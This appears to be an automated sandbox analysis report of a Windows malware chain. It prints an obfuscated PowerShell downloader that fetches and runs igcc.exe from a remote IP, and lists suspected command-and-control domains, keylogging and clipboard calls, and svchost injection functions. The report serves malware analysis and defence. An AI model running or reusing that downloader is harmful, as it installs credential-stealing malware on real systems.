Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 15 Apr 2025 15:23:35 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Cache-Control: no-cache, no-store, must-revalidate | Expires: Tue, 15 Apr 2025 15:23:35 GMT | Vary: Accept-Encoding | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t5lojvT5sLtUKSn7UIBZuQwf8HQFw7%2BdgD53%2FirSwRUt7WLB2%2ByX92kdo1ydLDk73%2Fe%2F2WSrNS8h9ctd02%2BagyQ7HvvzTqI%2FA9IDh5kKQvTBiNFF%2B87C2vLZyCHzUZT9QtHFnnOPfcuSSA%3D%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 930c71e6cb31ac95-MIA | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=122596&min_rtt=122596&rtt_var=61298&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=582&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" | Data Ascii: 93<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0</center></body></html>
Source: powershell.exe, 00000003.00000002.1374616824.0000000004991000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://172.245.208.21/233/igcc.e
Source: powershell.exe, 00000003.00000002.1374616824.0000000004991000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://172.245.208.21/233/igcc.exe
Source: powershell.exe, 00000003.00000002.1378744735.0000000006BC0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://172.245.208.21/233/igcc.exe%b
Source: powershell.exe, 00000003.00000002.1378744735.0000000006BC0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://172.245.208.21/233/igcc.exe)e
Source: powershell.exe, 00000003.00000002.1378744735.0000000006BC0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://172.245.208.21/233/igcc.exeSb
Source: powershell.exe, 00000003.00000002.1378744735.0000000006BC0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000003.00000002.1377381136.00000000055DB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.1374616824.00000000046C7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.1374616824.00000000046C7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000003.00000002.1374616824.0000000004571000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.1374616824.00000000046C7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000003.00000002.1374616824.00000000046C7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: WRNKS5Hlc0y.exe, 0000000F.00000002.3675591492.0000000006A88000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.play-venom-rush.xyz
Source: WRNKS5Hlc0y.exe, 0000000F.00000002.3675591492.0000000006A88000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.play-venom-rush.xyz/pji1/
Source: WRNKS5Hlc0y.exe, 0000000F.00000002.3673593729.0000000004D08000.00000004.80000000.00040000.00000000.sdmp, AtBroker.exe, 00000010.00000002.3666703257.0000000005E68000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://www.soportemx-findmy.click/ma0g?gp=1&js=1&uuid=1744730452.0012257657&other_args=eyJ1cmkiOiAiL
Source: AtBroker.exe, 00000010.00000002.3666703257.0000000005E68000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://www70.soportemx-findmy.click/
Source: AtBroker.exe, 00000010.00000002.3668697637.00000000081BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org?q=
Source: powershell.exe, 00000003.00000002.1374616824.0000000004571000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000003.00000002.1374616824.00000000046C7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: AtBroker.exe, 00000010.00000002.3668697637.00000000081BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: AtBroker.exe, 00000010.00000002.3668697637.00000000081BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: AtBroker.exe, 00000010.00000002.3668697637.00000000081BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000003.00000002.1377381136.00000000055DB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.1377381136.00000000055DB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.1377381136.00000000055DB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: AtBroker.exe, 00000010.00000002.3668697637.00000000081BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/?q=
Source: AtBroker.exe, 00000010.00000002.3668697637.00000000081BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: AtBroker.exe, 00000010.00000002.3668697637.00000000081BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: AtBroker.exe, 00000010.00000002.3668697637.00000000081BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://gemini.google.com/app?q=
Source: powershell.exe, 00000003.00000002.1374616824.00000000046C7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: AtBroker.exe, 00000010.00000002.3664527850.00000000033E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: AtBroker.exe, 00000010.00000002.3664527850.00000000033E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: AtBroker.exe, 00000010.00000002.3664527850.00000000033E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf
Source: AtBroker.exe, 00000010.00000002.3664527850.00000000033E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2X
Source: AtBroker.exe, 00000010.00000002.3664527850.00000000033E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf(
Source: AtBroker.exe, 00000010.00000002.3664527850.00000000033E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: AtBroker.exe, 00000010.00000002.3664527850.00000000033E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srfxL
Source: AtBroker.exe, 00000010.00000002.3664527850.00000000033E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: AtBroker.exe, 00000010.00000002.3664527850.00000000033E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: AtBroker.exe, 00000010.00000003.1838117321.000000000819B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: powershell.exe, 00000003.00000002.1377381136.00000000055DB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: AtBroker.exe, 00000010.00000002.3668697637.00000000081BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: WRNKS5Hlc0y.exe, 0000000F.00000002.3673593729.0000000005998000.00000004.80000000.00040000.00000000.sdmp, AtBroker.exe, 00000010.00000002.3666703257.0000000006AF8000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000010.00000002.3668565519.0000000007F10000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
Source: AtBroker.exe, 00000010.00000002.3668697637.00000000081BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp
Source: WRNKS5Hlc0y.exe, 0000000F.00000002.3673593729.0000000005E4E000.00000004.80000000.00040000.00000000.sdmp, AtBroker.exe, 00000010.00000002.3666703257.0000000006FAE000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.malayexpess.online/ca0u/?UV90oJV=MvRre
Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_00084164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_00083F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_0007001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState
Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_0009CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

E-Banking Fraud

Source: Yara match | File source: 13.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000010.00000002.3663915117.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.3664272191.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.1614478454.0000000007480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.1609453239.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.3675591492.0000000006A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.3664383512.0000000003370000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.1611189571.00000000047A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.3666208376.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwERsHElL.exE -Ex bypass -NOp -w 1 -C DEVIcecreDEntIalDePLoyMEnT.ExE ; IEX($(IEX('[SysteM.texT.ENCoDINg]'+[ChaR]0X3a+[ChaR]58+'utf8.getStrinG([systEm.cONveRt]'+[char]58+[cHar]58+'FrOmbAse64STRinG('+[CHar]0X22+'JFpzb2RoaDdrWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRVJkRWZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1Ukxtb04uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVb2pXamtsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhYW15WG92b08sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZHY09aUFhYaCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJaUXhpdVksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhIbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiY09pYm9lIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxBdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRac29kaGg3a1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjIwOC4yMS8yMzMvaWdjYy5leGUiLCIkRU5WOkFQUERBVEFcaWdjYy5leGUiLDAsMCk7c3RhUnQtc0xlZVAoMyk7aW52T0tlLWlURW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxpZ2NjLmV4ZSI='+[CHaR]34+'))')))"Jump to behavior
Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: This is a third-party compiled AutoIt script. (12_2_00013B3A)
Source: igcc.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: igcc.exe, 0000000C.00000002.1362921079.00000000000C4000.00000002.00000001.01000000.00000009.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. (memstr_9632e2a0-9)
Source: igcc.exe, 0000000C.00000002.1362921079.00000000000C4000.00000002.00000001.01000000.00000009.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` (memstr_1459977e-9)
Source: igcc[1].exe.3.dr | String found in binary or memory: This is a third-party compiled AutoIt script. (memstr_988ae612-5)
Source: igcc[1].exe.3.dr | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` (memstr_98335124-7)
Source: igcc.exe.3.dr | String found in binary or memory: This is a third-party compiled AutoIt script. (memstr_1fe0793b-f)
Source: igcc.exe.3.dr | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` (memstr_c651b88d-0)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\igcc.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\igcc[1].exe
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_0042CA23 NtClose
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A735C0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A72B60 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A72DF0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A74340 NtSetContextThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A73090 NtSetValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A73010 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A74650 NtSuspendThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A72BA0 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A72B80 NtQueryInformationFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A72BE0 NtQueryValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A72BF0 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A72AB0 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A72AF0 NtWriteFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A72AD0 NtReadFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A739B0 NtGetContextThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A72FA0 NtQuerySection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A72FB0 NtResumeThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A72F90 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A72FE0 NtCreateFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A72F30 NtCreateSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A72F60 NtCreateProcessEx
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A72EA0 NtAdjustPrivilegesToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A72E80 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A72EE0 NtQueueApcThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A72E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A72DB0 NtEnumerateKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A72DD0 NtDelayExecution
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A72D30 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A72D00 NtSetInformationFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A72D10 NtMapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A73D10 NtOpenProcessToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A73D70 NtOpenThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A72CA0 NtQueryInformationToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A72CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A72CC0 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A72C00 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A72C60 NtCreateKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A72C70 NtFreeVirtualMemory
Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_0007A1EF GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle
Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_00068310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_000751BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_0001E6A0
Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_0003D975
Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_0001FCE0
Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_000321C5
Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_000462D2
Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_000903DA
Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_0004242E
Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_000325FA
Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_0006E616
Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_000266E1
Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_0004878F
Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_00028808
Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_00046844
Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_00090857
Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_00078889
Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_0003CB21
Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_00046DB6
Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_00026F9E
Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_00023030
Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_00033187
Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_0003F1D9
Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_00011287
Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_00031484
Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_00025520
Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_00037696
Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_00025760
Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_00031978
Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_00031D90
Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_0003BDA6
Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_00097DDB
Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_0001DF00
Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_00023FE0
Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_01455570
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_00418993
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_0042F043
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_00402870
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_0041017A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_00410183
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_00403190
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_00401240
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_0040E383
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_00416B8F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_00416B93
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_004103A3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_00402C74
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_0040E4C7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_0040E4D3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_00402C80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_0040E51C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_004045E4
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_004047A5
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A8739A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A4E3F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03B003E6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03AF132D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A2D34C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03AFA352
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A452A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE12ED13_2_03AE12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A5B2C013_2_03A5B2C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE027413_2_03AE0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A4B1B013_2_03A4B1B0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03B001AA13_2_03B001AA
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AF81CC13_2_03AF81CC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A3010013_2_03A30100
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03ADA11813_2_03ADA118
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A7516C13_2_03A7516C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F17213_2_03A2F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03B0B16B13_2_03B0B16B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AF70E913_2_03AF70E9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AFF0E013_2_03AFF0E0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AEF0CC13_2_03AEF0CC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A470C013_2_03A470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AFF7B013_2_03AFF7B0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A3C7C013_2_03A3C7C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A4077013_2_03A40770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A6475013_2_03A64750
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A5C6E013_2_03A5C6E0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AF16CC13_2_03AF16CC
